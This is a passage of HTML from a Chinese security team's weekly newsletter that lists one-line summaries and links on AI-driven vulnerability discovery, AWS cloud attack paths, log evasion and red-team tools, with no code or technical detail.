translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">人工智能和安全</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Firefox团队应用Mythos AI模型扫描发现271个漏洞并修复</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://blog.mozilla.org/en/firefox/ai-security-zero-day-vulnerability/" target="_blank">https://blog.mozilla.org/en/firefox/ai-security-zero-day-vulnerability/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Anthropic Mythos模型遭遇未授权访问，Project Glasswing存在第三方访问风险</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.techradar.com/pro/security/mythos-accessed-by-unauthorized-users-as-anthropic-says-were-investigating-cracks-may-be-showing-in-project-glasswing-as-unknown-users-access-model-via-third-parties" target="_blank">https://www.techradar.com/pro/security/mythos-accessed-by-unauthorized-users-as-anthropic-says-were-investigating-cracks-may-be-showing-in-project-glasswing-as-unknown-users-access-model-via-third-parties</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">分析AI漏洞发现能力与网络攻击的关系，提出以攻击者为中心的威胁建模</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://joshuasaxe181906.substack.com/p/exploits-dont-cause-cyberattacks" target="_blank">https://joshuasaxe181906.substack.com/p/exploits-dont-cause-cyberattacks</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AISI评估显示Claude Mythos拥有自主发现漏洞并执行多阶段攻击的能力</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.aisi.gov.uk/blog/our-evaluation-of-claude-mythos-previews-cyber-capativity" target="_blank">https://www.aisi.gov.uk/blog/our-evaluation-of-claude-mythos-previews-cyber-capativity</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">对Claude mythos的质疑分析，如缺乏独立验证，以及与传统 Fuzzer的对比</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.flyingpenguin.com/the-boy-that-cried-mythos-verification-is-collapsing-trust-in-anthropic/" target="_blank">https://www.flyingpenguin.com/the-boy-that-cried-mythos-verification-is-collapsing-trust-in-anthropic/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AI测试区分真伪漏洞能力，分析FreeBSD NFS及OpenBSD SACK案例</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://aisle.com/blog/ai-cybersecurity-after-mythos-the-jagged-frontier" target="_blank">https://aisle.com/blog/ai-cybersecurity-after-mythos-the-jagged-frontier</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">利用公开模型复现Anthropic发现，验证基础漏洞发现能力已普及，利用构建是难点</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://blog.vidocsecurity.com/blog/we-reproducted-anthropics-mythos-findings-with-public-models" target="_blank">https://blog.vidocsecurity.com/blog/we-reproducted-anthropics-mythos-findings-with-public-models</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">实验验证开源及旗舰模型难以在无提示下复现Mythos漏洞发现</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://semgrep.dev/blog/2026/needles-and-haystacks-can-open-source-flagship-models-do-what-mythos-did/" target="_blank">https://semgrep.dev/blog/2026/needles-and-haystacks-can-open-source-flagship-models-do-what-mythos-did/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">nano-analyzer扫描FreeBSD内核检出零日漏洞CVE-2026-4747</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://aisle.com/blog/system-over-model-zero-day-discovery-at-the-jagged-frontier" target="_blank">https://aisle.com/blog/system-over-model-zero-day-discovery-at-the-jagged-frontier</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">OpenAI发布GPT-5.4-Cyber，经防御性安全级别，扩大可信访问项目</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://openai.com/index/scaling-trusted-access-for-cyber-defense" target="_blank">https://openai.com/index/scaling-trusted-access-for-cyber-defense</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Trail of Bits发布MuTON和mewt，利用Tree-sitter实现针对AI代理的变异测试</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://blog.trailofbits.com/2026/04/01/mutation-testing-for-the-agentic-era/" target="_blank">https://blog.trailofbits.com/2026/04/01/mutation-testing-for-the-agentic-era/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">分析AWS Bedrock AgentCore组件存在的IAM God Mode权限风险</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://unit42.paloaltonetworks.com/exploit-of-aws-agentcore-iam-god-mode/" target="_blank">https://unit42.paloaltonetworks.com/exploit-of-aws-agentcore-iam-god-mode/</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">云安全</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AWS EKS容器逃逸到节点节点、横向移动到其他Pod、窃取EC2 IAM 明显攻击路径</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://cybersecnerds.com/badpods-series-everything-allowed-on-aws-eks" target="_blank">https://cybersecnerds.com/badpods-series-everything-allowed-on-aws-eks</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">S3请求利用VPC端点绕过CloudTrail日志，导致攻击行为不可见</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.varonis.com/blog/anonymous-s3-requests-evade-aws-logging" target="_blank">https://www.varonis.com/blog/anonymous-s3-requests-evade-aws-logging</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">其他</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">发布SmokedMeat红队工具，扫描GitHub Actions注入缺陷与Token权限</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://labs.boostsecurity.io/articles/introducing-smokedmeat/" target="_blank">https://labs.boostsecurity.io/articles/introducing-smokedmeat/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">snoop：基于ebpf的现代syscall追踪器</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/pandaadir05/snoop" target="_blank">https://github.com/pandaadir05/snoop</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="jpeg" data-w="344" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011356" src="https://wechat2rss.xlab.app/img-proxy/?k=89dcf164&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCn8nkiagiazN4qyYa0skTaXaLnqyyevrYT1kDZDSzKkCiaIw4HuHF1OXZ89A3qGrJL8RyNNw3uuJEKMvdv8N6VsaVQlA0mlRTR3ics%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">M01N Team公众号</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">聚焦高级攻防对抗热点技术</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绿盟科技蓝军技术研究战队</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9145907473309609" data-s="300,640" data-type="png" data-w="562" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011357" src="https://wechat2rss.xlab.app/img-proxy/?k=1dea25b7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCn3Haa895eoyMfbRooXv0dHdicwVYgNgGWkhKKe2jicOBGuKG4qDmARtLBbuHboTh38HIXibw7BgXZhMImTMFzPgY1BNThjTzrnmY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方攻防交流群</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">网络安全一手资讯</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻防技术答疑解惑</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">扫码加好友即可拉群</span></p></div></div></div></div><div style="margin: 10px 0% 0px;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 10px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 17px;padding: 0px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">往期推荐</span></b></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494984&amp;idx=1&amp;sn=ea46bd4807fef8f239f9ccf214502a09&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.4.11-4.17）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.4.11-4.17）</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a 